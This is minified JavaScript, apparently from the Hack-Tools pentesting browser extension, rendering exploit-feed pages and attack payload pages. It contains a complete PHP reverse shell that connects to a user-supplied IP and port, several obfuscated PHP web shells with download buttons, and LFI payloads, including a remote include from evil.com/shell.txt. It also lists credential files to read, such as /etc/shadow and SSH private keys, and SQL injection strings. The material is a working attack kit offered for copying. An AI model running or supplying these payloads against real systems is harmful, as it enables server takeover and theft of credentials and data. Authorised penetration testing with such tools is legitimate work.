bug")))),"success"===t&&r.default.createElement("div",{key:"a",style:{padding:15}},r.default.createElement(d,{level:4,style:{fontWeight:"bold",marginTop:15}},"Recent Exploit"),r.default.createElement(i.List,{itemLayout:"horizontal",dataSource:e.items,style:{marginTop:15},renderItem:e=>r.default.createElement(i.List.Item,{actions:[r.default.createElement("div",null,(()=>{const t=e.content.match(/Risk: (\w{1,})/)[1];switch(t){case"High":return r.default.createElement(i.Tag,{color:"red"},t);case"Medium":return r.default.createElement(i.Tag,{color:"orange"},t);case"Low":return r.default.createElement(i.Tag,{color:"green"},t);default:return"None"}})()),r.default.createElement(i.Tag,{color:"geekblue",style:{marginLeft:5}},e.author)]},r.default.createElement("a",{href:e.link,target:"_blank",rel:"noreferrer noopener"},e.title))})))}},96808:function(e,t,l){"use strict";var a=this&&this.__awaiter||function(e,t,l,a){return new(l||(l=Promise))((function(n,r){function i(e){try{c(a.next(e))}catch(e){r(e)}}function o(e){try{c(a.throw(e))}catch(e){r(e)}}function c(e){var t;e.done?n(e.value):(t=e.value,t instanceof l?t:new l((function(e){e(t)}))).then(i,o)}c((a=a.apply(e,t||[])).next())}))},n=this&&this.__importDefault||function(e){return e&&e.__esModule?e:{default:e}};Object.defineProperty(t,"__esModule",{value:!0});const r=n(l(50959)),i=l(35401),o=l(91861),c=l(28620),u=l(1759),s=n(l(45386)),{Title:d}=i.Typography,p=()=>a(void 0,void 0,void 0,(function*(){return(yield fetch("https://api.rss2json.com/v1/api.json?rss_url=https%3A%2F%2Fwww.exploit-db.com%2Frss.xml&api_key=spbf63tt7rvx2r0wh2x6yoz00ssjyztpceqqkdj3&order_dir=desc&count=100")).json()}));t.default=function(){const{data:e,status:t}=(0,u.useQuery)("exploitdb",p);return r.default.createElement("div",null,r.default.createElement(o.PageHeader,{onBack:()=>(0,c.goTo)(s.default),title:"Feed RSS",subTitle:"Exploit-DB.com RSS Feed",extra:[r.default.createElement(i.Button,{href:"https://exploit-db.com",target:"blank",key:"1",type:"primary"},"Visit orignal website")]}),"loading"===t&&r.default.createElement("div",{style:{textAlign:"center"}},r.default.createElement(i.Spin,null),r.default.createElement(i.Empty,null)),"error"===t&&r.default.createElement("div",null,r.default.createElement(i.Empty,{image:"https://gw.alipayobjects.com/zos/antfincdn/ZHrcdLPrvN/empty.svg",imageStyle:{height:60},description:r.default.createElement("span",null,"Error getting the data please contact us.")},r.default.createElement(i.Button,{danger:!0},r.default.createElement("a",{href:"https://github.com/LasCC/Hack-Tools/issues",rel:"noreferrer noopener",target:"_blank"},"Report the bug")))),"success"===t&&r.default.createElement("div",{key:"a",style:{padding:15}},r.default.createElement(d,{level:4,style:{fontWeight:"bold",marginTop:15}},"Recent exploit"),r.default.createElement(i.List,{itemLayout:"horizontal",dataSource:e.items,style:{marginTop:15},renderItem:e=>r.default.createElement(i.List.Item,{actions:[r.default.createElement("div",null,(()=>{var t;const l=null!==(t=e.title.match(/[a-zA-Z]+/)[0])&&void 0!==t?t:"";switch(l){case"webapps":return r.default.createElement(i.Tag,{color:"processing"},l);case"local":return r.default.createElement(i.Tag,{color:"magenta"},l);case"dos":return r.default.createElement(i.Tag,{color:"orange"},l);case"remote":return r.default.createElement(i.Tag,{color:"green"},l);default:return"None"}})()),r.default.createElement(i.Tag,{color:"geekblue",style:{marginLeft:5}},e.pubDate.slice(e.pubDate.indexOf("20"),e.pubDate.lastIndexOf("0")-8))]},r.default.createElement("a",{href:e.link,target:"_blank",rel:"noreferrer noopener"},e.description))})))}},45386:function(e,t,l){"use strict";var a=this&&this.__importDefault||function(e){return e&&e.__esModule?e:{default:e}};Object.defineProperty(t,"__esModule",{value:!0});const n=a(l(50959)),r=l(35401),i=l(28620),o=l(73706),c=a(l(96808)),u=a(l(82777)),s=a(l(50249)),d=a(l(82997)),{Title:p,Paragraph:m}=r.Typography,{Meta:f}=r.Card;t.default=function(){return n.default.createElement("div",null,n.default.createElement(p,{level:2,style:{fontWeight:"bold",margin:15}},"Exploit Feed RSS"),n.default.createElement(m,{style:{margin:15}},"Feed about > Exploits, Shellcode, 0days, Remote Exploits, Local Exploits, Web Apps, Vulnerability Reports, Security Articles, Tutorials and more."),n.default.createElement(r.Row,{gutter:[32,24],style:{padding:15}},n.default.createElement(r.Col,{span:12},n.default.createElement(r.Card,{onClick:()=>(0,i.goTo)(c.default),style:{cursor:"pointer",boxShadow:"0 0px 3.6px rgba(0, 0, 0, 0.017), 0 0px 10px rgba(0, 0, 0, 0.025), 0 0px 24.1px rgba(0, 0, 0, 0.033), 0 0px 80px rgba(0, 0, 0, 0.05)"},cover:n.default.createElement("img",{alt:"exploit-db_website_homepage",src:"https://i.imgur.com/ST3cgmI.png"}),actions:[n.default.createElement(r.Tooltip,{title:"Watch the feed"},n.default.createElement(o.EyeOutlined,{key:"goto_page",onClick:()=>(0,i.goTo)(c.default)})),n.default.createElement(r.Tooltip,{title:"Website link"},n.default.createElement("a",{href:"https://exploit-db.com",rel:"noreferrer noopener",target:"_blank"},n.default.createElement(o.LinkOutlined,{key:"website_link"})))]},n.default.createElement(f,{avatar:n.default.createElement(r.Avatar,{src:"https://www.exploit-db.com/images/spider-orange.png"}),title:"ExploitDB",description:"Exploit Database Vulnerabilities"}))),n.default.createElement(r.Col,{span:12},n.default.createElement(r.Card,{onClick:()=>(0,i.goTo)(u.default),style:{cursor:"pointer",boxShadow:"0 0px 3.6px rgba(0, 0, 0, 0.017), 0 0px 10px rgba(0, 0, 0, 0.025), 0 0px 24.1px rgba(0, 0, 0, 0.033), 0 0px 80px rgba(0, 0, 0, 0.05)"},cover:n.default.createElement("img",{alt:"cisco_image_logo",src:"https://i.imgur.com/8EWAc2t.png"}),actions:[n.default.createElement(r.Tooltip,{title:"Watch the feed"},n.default.createElement(o.EyeOutlined,{key:"goto_page",onClick:()=>(0,i.goTo)(u.default)})),n.default.createElement(r.Tooltip,{title:"Website link"},n.default.createElement("a",{href:"https://tools.cisco.com/security/center/publicationListing.x",rel:"noreferrer noopener",target:"_blank"},n.default.createElement(o.LinkOutlined,{key:"website_link"})))]},n.default.createElement(f,{avatar:n.default.createElement(r.Avatar,{src:"https://cdn.1min30.com/wp-content/uploads/2018/07/Symbole-Cisco.jpg"}),title:"Cisco",description:"Cisco Security Advisories"}))),n.default.createElement(r.Col,{span:12},n.default.createElement(r.Card,{onClick:()=>(0,i.goTo)(s.default),style:{cursor:"pointer",boxShadow:"0 0px 3.6px rgba(0, 0, 0, 0.017), 0 0px 10px rgba(0, 0, 0, 0.025), 0 0px 24.1px rgba(0, 0, 0, 0.033), 0 0px 80px rgba(0, 0, 0, 0.05)"},cover:n.default.createElement("img",{alt:"cve_image_logo",src:"https://i.imgur.com/AtKXVuk.png"}),actions:[n.default.createElement(r.Tooltip,{title:"Watch the feed"},n.default.createElement(o.EyeOutlined,{key:"goto_page",onClick:()=>(0,i.goTo)(s.default)})),n.default.createElement(r.Tooltip,{title:"Website link"},n.default.createElement("a",{href:"https://www.cve-search.org/",rel:"noreferrer noopener",target:"_blank"},n.default.createElement(o.LinkOutlined,{key:"website_link"})))]},n.default.createElement(f,{avatar:n.default.createElement(r.Avatar,{src:"https://d1yjjnpx0p53s8.cloudfront.net/styles/logo-thumbnail/s3/0012/5120/brand.gif?itok=mqo4KWCS"}),title:"CVE",description:"CVE Search engine"}))),n.default.createElement(r.Col,{span:12},n.default.createElement(r.Card,{onClick:()=>(0,i.goTo)(d.default),style:{cursor:"pointer",boxShadow:"0 0px 3.6px rgba(0, 0, 0, 0.017), 0 0px 10px rgba(0, 0, 0, 0.025), 0 0px 24.1px rgba(0, 0, 0, 0.033), 0 0px 80px rgba(0, 0, 0, 0.05)"},cover:n.default.createElement("img",{alt:"cve_image_logo",src:"https://i.imgur.com/agGXTkQ.jpg"}),actions:[n.default.createElement(r.Tooltip,{title:"Watch the feed"},n.default.createElement(o.EyeOutlined,{key:"goto_page",onClick:()=>(0,i.goTo)(d.default)})),n.default.createElement(r.Tooltip,{title:"Website link"},n.default.createElement("a",{href:"https://cxsecurity.com//",rel:"noreferrer noopener",target:"_blank"},n.default.createElement(o.LinkOutlined,{key:"website_link"})))]},n.default.createElement(f,{avatar:n.default.createElement(r.Avatar,{src:"https://pbs.twimg.com/profile_images/3596734713/c2cd4061a323024ff00ccf0c83c61d1d.jpeg"}),title:"CX",description:"CXSECURITY"})))),n.default.createElement("div",{style:{textAlign:"center"}},n.default.createElement(m,null,"You have a suggestion about the feed ?"),n.default.createElement(r.Button,{icon:n.default.createElement(o.GithubOutlined,null),type:"link"},n.default.createElement("a",{href:"https://github.com/LasCC/Hack-Tools/issues/new",rel:"noreferrer noopener",target:"_blank",style:{marginLeft:8}},"Give us your feedback"))))}},97989:function(e,t,l){"use strict";var a=this&&this.__importDefault||function(e){return e&&e.__esModule?e:{default:e}};Object.defineProperty(t,"__esModule",{value:!0});const n=a(l(50959)),r=l(35401),i=l(73706),o=a(l(17911)),{Title:c,Paragraph:u,Text:s}=r.Typography;t.default=function(){const e=()=>{r.message.success("Your payload has been copied successfully !")},t=()=>{r.message.success("Your payload URL encoded has been copied successfully !")},l="foo.php?file=../../../../../../../etc/passwd",a="/example1.php?page=expect://ls",d="/example1.php?page=php://filter/convert.base64-encode/resource=../../../../../etc/passwd",p="http://example.com/index.php?page=http://evil.com/shell.txt";return n.default.createElement("div",null,n.default.createElement(c,{level:2,style:{fontWeight:"bold",margin:15}},"LFI"),n.default.createElement(u,{style:{margin:15}},"LFI stands for Local File Includes - it's a file local inclusion vulnerability that allows an attacker to include files that exist on the target web server."),n.default.createElement(u,{style:{marginLeft:15}},"Typically this is exploited by abusing dynamic file inclusion mechanisms that don't sanitize user input."),n.default.createElement(r.Divider,{dashed:!0}),n.default.createElement("div",{style:{padding:10,marginTop:15},key:"a"},n.default.createElement(c,{level:3},"Directory traversal"),n.default.createElement(u,{ellipsis:!0},n.default.createElement("pre",null,n.default.createElement(s,{copyable:!0},l))),n.default.createElement(o.default,{component:"a","data-clipboard-text":l},n.default.createElement(r.Button,{type:"primary",onClick:e,style:{marginBottom:10,marginTop:15}},n.default.createElement(i.CopyOutlined,null)," Copy the payload")),n.default.createElement(o.default,{component:"a","data-clipboard-text":encodeURI(l)},n.default.createElement(r.Button,{type:"dashed",onClick:t,style:{marginBottom:10,marginTop:15,marginLeft:15}},n.default.createElement(i.LinkOutlined,null)," URL encoded"))),n.default.createElement(r.Divider,{dashed:!0}),n.default.createElement("div",{key:"b",style:{padding:15,marginTop:15}},n.default.createElement(c,{level:3},"PHP Wrapper php://file"),n.default.createElement(u,{ellipsis:!0},n.default.createElement("pre",null,n.default.createElement(s,{copyable:!0},a))),n.default.createElement(o.default,{component:"a","data-clipboard-text":a},n.default.createElement(r.Button,{type:"primary",onClick:e,style:{marginBottom:10,marginTop:15}},n.default.createElement(i.CopyOutlined,null),"Copy the payload")),n.default.createElement(o.default,{component:"a","data-clipboard-text":encodeURI(a)},n.default.createElement(r.Button,{type:"dashed",onClick:t,style:{marginBottom:10,marginTop:15,marginLeft:15}},n.default.createElement(i.LinkOutlined,null)," URL encoded"))),n.default.createElement(r.Divider,{dashed:!0}),n.default.createElement("div",{key:"c",style:{padding:15,marginTop:15}},n.default.createElement(c,{level:3},"PHP Wrapper php://filter"),n.default.createElement(u,{ellipsis:!0},n.default.createElement("pre",null,n.default.createElement(s,{copyable:!0},d))),n.default.createElement(o.default,{component:"a","data-clipboard-text":d},n.default.createElement(r.Button,{type:"primary",onClick:e,style:{marginBottom:10,marginTop:15}},n.default.createElement(i.CopyOutlined,null),"Copy the payload")),n.default.createElement(o.default,{component:"a","data-clipboard-text":encodeURI(d)},n.default.createElement(r.Button,{type:"dashed",onClick:t,style:{marginBottom:10,marginTop:15,marginLeft:15}},n.default.createElement(i.LinkOutlined,null)," URL encoded"))),n.default.createElement(r.Divider,{dashed:!0}),n.default.createElement("div",{key:"d",style:{padding:15,marginTop:15}},n.default.createElement(c,{level:3},"PHP Wrapper php://filter"),n.default.createElement(u,{ellipsis:!0},n.default.createElement("pre",null,n.default.createElement(s,{copyable:!0},p))),n.default.createElement(o.default,{component:"a","data-clipboard-text":p},n.default.createElement(r.Button,{type:"primary",onClick:e,style:{marginBottom:10,marginTop:15}},n.default.createElement(i.CopyOutlined,null),"Copy the payload")),n.default.createElement(o.default,{component:"a","data-clipboard-text":encodeURI(p)},n.default.createElement(r.Button,{type:"dashed",onClick:t,style:{marginBottom:10,marginTop:15,marginLeft:15}},n.default.createElement(i.LinkOutlined,null)," URL encoded"))),n.default.createElement(r.Divider,{dashed:!0}),n.default.createElement("div",{key:"e",style:{padding:15,marginTop:15}},n.default.createElement(c,{level:3},"Useful LFI files"),n.default.createElement(c,{level:4},"Linux"),[{title:"/etc/passwd"},{title:"/etc/shadow"},{title:"/etc/issue"},{title:"/etc/group"},{title:"/etc/hostname"},{title:"/etc/ssh/ssh_config"},{title:"/etc/ssh/sshd_config"},{title:"/root/.ssh/id_rsa"},{title:"/root/.ssh/authorized_keys"},{title:"/home/$USER/.ssh/authorized_keys"},{title:"/home/$USER/.ssh/id_rsa"},{title:"/proc/[0-9]*/fd/[0-9]*"},{title:"/proc/mounts"},{title:"/home/$USER/.bash_history"},{title:"/home/$USER/.ssh/id_rsa"},{title:"/var/run/secrets/kubernetes.io/serviceaccount"},{title:"/var/lib/mlocate/mlocate.db"},{title:"/var/lib/mlocate.db"}].map(((e,t)=>n.default.createElement(u,{key:t},n.default.createElement("pre",null,n.default.createElement(s,{copyable:!0},e.title))))),n.default.createElement(r.Divider,{dashed:!0}),n.default.createElement(c,{level:4},"Apache"),[{title:"/etc/apache2/apache2.conf"},{title:"/usr/local/etc/apache2/httpd.conf"},{title:"/etc/httpd/conf/httpd.conf"},{title:"Red Hat/CentOS/Fedora Linux -> /var/log/httpd/access_log"},{title:"Debian/Ubuntu -> /var/log/apache2/access.log"},{title:"FreeBSD -> /var/log/httpd-access.log"},{title:"/var/log/apache/access.log"},{title:"/var/log/apache/error.log"},{title:"/var/log/apache2/access.log"},{title:"/var/log/apache/error.log"}].map(((e,t)=>n.default.createElement(u,{key:t},n.default.createElement("pre",null,n.default.createElement(s,{copyable:!0},e.title))))),n.default.createElement(r.Divider,{dashed:!0}),n.default.createElement(c,{level:4},"MySQL"),[{title:"/var/lib/mysql/mysql/user.frm"},{title:"/var/lib/mysql/mysql/user.MYD"},{title:"/var/lib/mysql/mysql/user.MYI"}].map(((e,t)=>n.default.createElement(u,{key:t},n.default.createElement("pre",null,n.default.createElement(s,{copyable:!0},e.title))))),n.default.createElement(r.Divider,{dashed:!0}),n.default.createElement(c,{level:4},"Windows"),[{title:"/boot.ini"},{title:"/autoexec.bat"},{title:"/windows/system32/drivers/etc/hosts"},{title:"/windows/repair/SAM"},{title:"/windows/panther/unattended.xml"},{title:"/windows/panther/unattend/unattended.xml"},{title:"/windows/system32/license.rtf"},{title:"/windows/system32/eula.txt"}].map(((e,t)=>n.default.createElement(u,{key:t},n.default.createElement("pre",null,n.default.createElement(s,{copyable:!0},e.title)))))),n.default.createElement(r.Divider,{dashed:!0}))}},28505:function(e,t,l){"use strict";var a=this&&this.__importDefault||function(e){return e&&e.__esModule?e:{default:e}};Object.defineProperty(t,"__esModule",{value:!0});const n=a(l(50959)),r=a(l(31529)),i=l(35401),o=l(73706),c=a(l(17911)),u=a(l(13326)),s=l(9195),d=a(l(90929)),{Title:p,Paragraph:m,Text:f}=i.Typography,{Panel:v}=i.Collapse,h=(0,o.createFromIconfontCN)({scriptUrl:["./iconfont.js"]});t.default=function(){const e=(0,r.default)("ipv4_tcp_cache"),[t,l]=e({ip:"",port:""}),a=e=>a=>{l(Object.assign(Object.assign({},t),{[e]:a.target.value}))},[_,g]=i.message.useMessage(),y=()=>{_.success("Your reverse shell has been copied successfully !")},E='<?php system($_GET["cmd"]);?>',b="<?=$_=\"\";$_=\"'\" ;$_=($_^chr(4*4*(5+5)-40)).($_^chr(47+ord(1==1))).($_^chr(ord('_')+3)).($_^chr(((10*10)+(5*3))));$_=${$_}['_'^'o'];echo`$_`?>",w="<?php $_=\"{\"; $_=($_^\"<\").($_^\">;\").($_^\"/\"); ?><?=${'_'.$_}['_'](${'_'.$_}['__']);?>",x=`\n <?php\n // php-reverse-shell - A Reverse Shell implementation in PHP\n // Copyright (C) 2007 [email protected]\n\n set_time_limit (0);\n $VERSION = "1.0";\n $ip = '${t.ip}'; // You have changed this\n $port = ${t.port}; // And this\n $chunk_size = 1400;\n $write_a = null;\n $error_a = null;\n $shell = 'uname -a; w; id; /bin/sh -i';\n $daemon = 0;\n $debug = 0;\n\n //\n // Daemonise ourself if possible to avoid zombies later\n //\n\n // pcntl_fork is hardly ever available, but will allow us to daemonise\n // our php process and avoid zombies. Worth a try...\n if (function_exists('pcntl_fork')) {\n // Fork and have the parent process exit\n $pid = pcntl_fork();\n \n if ($pid == -1) {\n printit("ERROR: Can't fork");\n exit(1);\n }\n \n if ($pid) {\n exit(0); // Parent exits\n }\n\n // Make the current process a session leader\n // Will only succeed if we forked\n if (posix_setsid() == -1) {\n printit("Error: Can't setsid()");\n exit(1);\n }\n\n $daemon = 1;\n } else {\n printit("WARNING: Failed to daemonise. This is quite common and not fatal.");\n }\n\n // Change to a safe directory\n chdir("/");\n\n // Remove any umask we inherited\n umask(0);\n\n //\n // Do the reverse shell...\n //\n\n // Open reverse connection\n $sock = fsockopen($ip, $port, $errno, $errstr, 30);\n if (!$sock) {\n printit("$errstr ($errno)");\n exit(1);\n }\n\n // Spawn shell process\n $descriptorspec = array(\n 0 => array("pipe", "r"), // stdin is a pipe that the child will read from\n 1 => array("pipe", "w"), // stdout is a pipe that the child will write to\n 2 => array("pipe", "w") // stderr is a pipe that the child will write to\n );\n\n $process = proc_open($shell, $descriptorspec, $pipes);\n\n if (!is_resource($process)) {\n printit("ERROR: Can't spawn shell");\n exit(1);\n }\n\n // Set everything to non-blocking\n // Reason: Occsionally reads will block, even though stream_select tells us they won't\n stream_set_blocking($pipes[0], 0);\n stream_set_blocking($pipes[1], 0);\n stream_set_blocking($pipes[2], 0);\n stream_set_blocking($sock, 0);\n\n printit("Successfully opened reverse shell to $ip:$port");\n\n while (1) {\n // Check for end of TCP connection\n if (feof($sock)) {\n printit("ERROR: Shell connection terminated");\n break;\n }\n\n // Check for end of STDOUT\n if (feof($pipes[1])) {\n printit("ERROR: Shell process terminated");\n break;\n }\n\n // Wait until a command is end down $sock, or some\n // command output is available on STDOUT or STDERR\n $read_a = array($sock, $pipes[1], $pipes[2]);\n $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);\n\n // If we can read from the TCP socket, send\n // data to process's STDIN\n if (in_array($sock, $read_a)) {\n if ($debug) printit("SOCK READ");\n $input = fread($sock, $chunk_size);\n if ($debug) printit("SOCK: $input");\n fwrite($pipes[0], $input);\n }\n\n // If we can read from the process's STDOUT\n // send data down tcp connection\n if (in_array($pipes[1], $read_a)) {\n if ($debug) printit("STDOUT READ");\n $input = fread($pipes[1], $chunk_size);\n if ($debug) printit("STDOUT: $input");\n fwrite($sock, $input);\n }\n\n // If we can read from the process's STDERR\n // send data down tcp connection\n if (in_array($pipes[2], $read_a)) {\n if ($debug) printit("STDERR READ");\n $input = fread($pipes[2], $chunk_size);\n if ($debug) printit("STDERR: $input");\n fwrite($sock, $input);\n }\n }\n\n fclose($sock);\n fclose($pipes[0]);\n fclose($pipes[1]);\n fclose($pipes[2]);\n proc_close($process);\n\n // Like print, but does nothing if we've daemonised ourself\n // (I can't figure out how to redirect STDOUT like a proper daemon)\n function printit ($string) {\n if (!$daemon) {\n print "$string\n";\n }\n }\n\n ?> \n `;return n.default.createElement("div",null,g,n.default.createElement("div",null,n.default.createElement(p,{level:2,style:{fontWeight:"bold",margin:15}},"PHP Reverse Shell"),n.default.createElement(m,{style:{margin:15}},"Attackers who successfully exploit a remote command execution vulnerability can use a reverse shell to obtain an interactive shell session on the target machine and continue their attack."),n.default.createElement("div",{style:{padding:15}},n.default.createElement(i.Row,{gutter:{xs:8,sm:16,md:24,lg:32}},n.default.createElement(i.Col,{span:12},n.default.createElement(i.Input,{maxLength:15,prefix:n.default.createElement(o.WifiOutlined,null),name:"Ip adress",placeholder:"IP Address or domain (ex: 212.212.111.222)",onChange:a("ip"),value:t.ip})),n.default.createElement(i.Col,{span:12},n.default.createElement(i.Input,{maxLength:5,prefix:n.default.createElement(h,{type:"icon-Network-Plug"}),name:"Port",placeholder:"Port (ex: 1337)",onChange:a("port"),value:t.port}))))),n.default.createElement(i.Divider,{orientation:"center"},"Pentestmonkey's reverse shell"),n.default.createElement("div",{style:{padding:15,marginTop:15}},n.default.createElement(m,null,"This script will make an outbound TCP connection to a hardcoded IP and port."),n.default.createElement(i.Collapse,{defaultActiveKey:["0"]},n.default.createElement(v,{header:"View the souce code",key:"1"},n.default.createElement(u.default,{language:"php",style:s.vs2015,showLineNumbers:!0},(0,d.default)(x)),n.default.createElement(i.Button,{href:"https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php",target:"blank",type:"dashed",style:{marginBottom:10,marginTop:15}},n.default.createElement(o.ArrowsAltOutlined,{style:{marginRight:10}}),"Pentestmonkey's repository"))),n.default.createElement(i.Button,{type:"primary",style:{marginBottom:10,marginTop:15},onClick:()=>{const e=document.createElement("a"),t=new Blob([x],{type:"text/plain"});e.href=URL.createObjectURL(t),e.download="rev.php",document.body.appendChild(e),e.click()}},n.default.createElement(o.DownloadOutlined,null),"Download"),n.default.createElement(c.default,{component:"a","data-clipboard-text":x},n.default.createElement(i.Button,{type:"dashed",style:{marginBottom:10,marginTop:15,marginLeft:15},onClick:y},n.default.createElement(o.CopyOutlined,null),"Copy"))),n.default.createElement(i.Divider,{orientation:"center"},"Basic RCE"),n.default.createElement("div",{style:{padding:15,marginTop:15}},n.default.createElement(m,null,'When you have successfully uploaded your payload, just put your commands after the variable ?cmd= (ex: ?cmd=ls -la")'),n.default.createElement(m,null,n.default.createElement("pre",null,n.default.createElement(f,{copyable:!0},E))),n.default.createElement(i.Button,{type:"primary",style:{marginBottom:10,marginTop:15},onClick:()=>{const e=document.createElement("a"),t=new Blob([E],{type:"text/plain"});e.href=URL.createObjectURL(t),e.download="basicRCE.php",document.body.appendChild(e),e.click()}},n.default.createElement(o.DownloadOutlined,null),"Download"),n.default.createElement(c.default,{component:"a","data-clipboard-text":E},n.default.createElement(i.Button,{type:"dashed",style:{marginBottom:10,marginTop:15,marginLeft:15},onClick:y},n.default.createElement(o.CopyOutlined,null),"Copy"))),n.default.createElement(i.Divider,{orientation:"center"},"Web Shell"),n.default.createElement("div",{style:{padding:15,marginTop:15}},n.default.createElement(m,null,"p0wny@shell:~# is a very basic, single-file, PHP shell. It can be used to quickly execute commands on a server when pentesting a PHP application."),n.default.createElement(i.Collapse,{defaultActiveKey:["0"]},n.default.createElement(v,{header:"Watch the preview",key:"1"},n.default.createElement("img",{src:"https://i.imgur.com/ALPFDj0.png",alt:"pownyShell",style:{height:"100%",width:"100%"}}))),n.default.createElement(i.Button,{href:"https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php",target:"blank",type:"primary",style:{marginBottom:10,marginTop:15}},n.default.createElement(o.DownloadOutlined,null)," Download"),n.default.createElement(i.Button,{href:"https://github.com/flozz/p0wny-shell",target:"blank",type:"dashed",style:{marginBottom:10,marginTop:15,marginLeft:15}},n.default.createElement(o.ArrowsAltOutlined,null)," Flozz's repository")),n.default.createElement(i.Divider,{orientation:"center"},"Obfuscated PHP Web Shell"),n.default.createElement("div",{style:{padding:15,marginTop:15}},n.default.createElement(m,null,n.default.createElement("pre",null,n.default.createElement(f,{copyable:!0},"<?=`$_GET[0]`?>"))),n.default.createElement(m,null," Usage : http://target.com/path/to/shell.php?0=command "),n.default.createElement(i.Button,{type:"primary",style:{marginBottom:10,marginTop:15},onClick:()=>{const e=document.createElement("a"),t=new Blob(["<?=`$_GET[0]`?>"],{type:"text/plain"});e.href=URL.createObjectURL(t),e.download="obfuscateShell.php",document.body.appendChild(e),e.click()}},n.default.createElement(o.DownloadOutlined,null)," Download"),n.default.createElement(c.default,{component:"a","data-clipboard-text":"<?=`$_GET[0]`?>"},n.default.createElement(i.Button,{type:"dashed",style:{marginBottom:10,marginTop:15,marginLeft:15},onClick:y},n.default.createElement(o.CopyOutlined,null)," Copy"))),n.default.createElement("div",{style:{padding:15,marginTop:15}},n.default.createElement(m,null,n.default.createElement("pre",null,n.default.createElement(f,{copyable:!0},"<?=`$_POST[0]`?>"))),n.default.createElement(m,null,' Usage : curl -X POST http://target.com/path/to/shell.php -d "0=command" '),n.default.createElement(i.Button,{type:"primary",style:{marginBottom:10,marginTop:15},onClick:()=>{const e=document.createElement("a"),t=new Blob(["<?=`$_POST[0]`?>"],{type:"text/plain"});e.href=URL.createObjectURL(t),e.download="obfuscateShell.php",document.body.appendChild(e),e.click()}},n.default.createElement(o.DownloadOutlined,null)," Download"),n.default.createElement(c.default,{component:"a","data-clipboard-text":"<?=`$_POST[0]`?>"},n.default.createElement(i.Button,{type:"dashed",style:{marginBottom:10,marginTop:15,marginLeft:15},onClick:y},n.default.createElement(o.CopyOutlined,null)," Copy"))),n.default.createElement("div",{style:{padding:15,marginTop:15}},n.default.createElement(m,null,n.default.createElement("pre",null,n.default.createElement(f,{copyable:!0},"<?=`{$_REQUEST['_']}`?>"))),n.default.createElement(m,null,"Usage :"),n.default.createElement(m,null,"- http://target.com/path/to/shell.php?_=command"),n.default.createElement(m,null,'- curl -X POST http://target.com/path/to/shell.php -d "_=command" \''),n.default.createElement(i.Button,{type:"primary",style:{marginBottom:10,marginTop:15},onClick:()=>{const e=document.createElement("a"),t=new Blob(["<?=`{$_REQUEST['_']}`?>"],{type:"text/plain"});e.href=URL.createObjectURL(t),e.download="obfuscateShell.php",document.body.appendChild(e),e.click()}},n.default.createElement(o.DownloadOutlined,null)," Download"),n.default.createElement(c.default,{component:"a","data-clipboard-text":"<?=`{$_REQUEST['_']}`?>"},n.default.createElement(i.Button,{type:"dashed",style:{marginBottom:10,marginTop:15,marginLeft:15},onClick:y},n.default.createElement(o.CopyOutlined,null)," Copy"))),n.default.createElement("div",{style:{padding:15,marginTop:15}},n.default.createElement(m,null,n.default.createElement("pre",null,n.default.createElement(f,{copyable:!0},b))),n.default.createElement(m,null,"Usage :"),n.default.createElement(m,null,"- http://target.com/path/to/shell.php?0=command"),n.default.createElement(i.Button,{type:"primary",style:{marginBottom:10,marginTop:15},onClick:()=>{const e=document.createElement("a"),t=new Blob([b],{type:"text/plain"});e.href=URL.createObjectURL(t),e.download="obfuscateShell.php",document.body.appendChild(e),e.click()}},n.default.createElement(o.DownloadOutlined,null)," Download"),n.default.createElement(c.default,{component:"a","data-clipboard-text":b},n.default.createElement(i.Button,{type:"dashed",style:{marginBottom:10,marginTop:15,marginLeft:15},onClick:y},n.default.createElement(o.CopyOutlined,null)," Copy"))),n.default.createElement("div",{style:{padding:15,marginTop:15}},n.default.createElement(m,null,n.default.createElement("pre",null,n.default.createElement(f,{copyable:!0},w))),n.default.createElement(m,null,"Usage :"),n.default.createElement(m,null,"- http://target.com/path/to/shell.php?_=function&__=argument"),n.default.createElement(m,null,"- http://target.com/path/to/shell.php?_=system&__=ls"),n.default.createElement(i.Button,{type:"primary",style:{marginBottom:10,marginTop:15},onClick:()=>{const e=document.createElement("a"),t=new Blob([w],{type:"text/plain"});e.href=URL.createObjectURL(t),e.download="obfuscateShell.php",document.body.appendChild(e),e.click()}},n.default.createElement(o.DownloadOutlined,null)," Download"),n.default.createElement(c.default,{component:"a","data-clipboard-text":w},n.default.createElement(i.Button,{type:"dashed",style:{marginBottom:10,marginTop:15,marginLeft:15},onClick:y},n.default.createElement(o.CopyOutlined,null)," Copy"))))}},55099:function(e,t,l){"use strict";var a=this&&this.__importDefault||function(e){return e&&e.__esModule?e:{default:e}};Object.defineProperty(t,"__esModule",{value:!0});const n=a(l(50959)),r=l(35401),{Title:i,Paragraph:o,Text:c,Link:u}=r.Typography;t.default=function(){const e=[{db_type:"MySQL",title:"' UNION SELECT IF(YOUR-CONDITION-HERE,(SELECT table_name FROM information_schema.tables),'a') -- -"},{db_type:"Postgres",title:"' UNION SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN cast(1/0 as text) ELSE NULL END -- -"},{db_type:"Oracle",title:"' UNION SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN to_char(1/0) ELSE NULL END FROM dual -- -"},{db_type:"MSSQL",title:"' UNION SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1/0 ELSE NULL END -- -"}];return n.default.createElement("div",null,n.default.createElement(i,{level:2,style:{fontWeight:"bold",margin:15}},"SQL Injection"),n.default.createElement(o,{style:{margin:15}},"SQL injection (SQLi) is an application security weakness that allows attackers to control an application’s database letting them access or delete data, change an application’s data-driven behavior, and do other undesirable things by tricking the application into sending unexpected SQL commands."),n.default.createElement(r.Divider,{dashed:!0}),n.default.createElement("div",{style:{padding:10,marginTop:15},key:"a"},n.default.createElement(i,{level:3},"Number of column"),[{db_type:"MySQL/MSSQL/PGSQL",title:"'UNION SELECT NULL,NULL,NULL -- -"},{db_type:"ORACLE",title:"'UNION SELECT NULL,NULL,NULL FROM DUAL -- -"},{db_type:"MYSQL/MSSQL/PGSQL/ORACLE - (add +1 until you get an exception)",title:"' UNION ORDER BY 1 -- 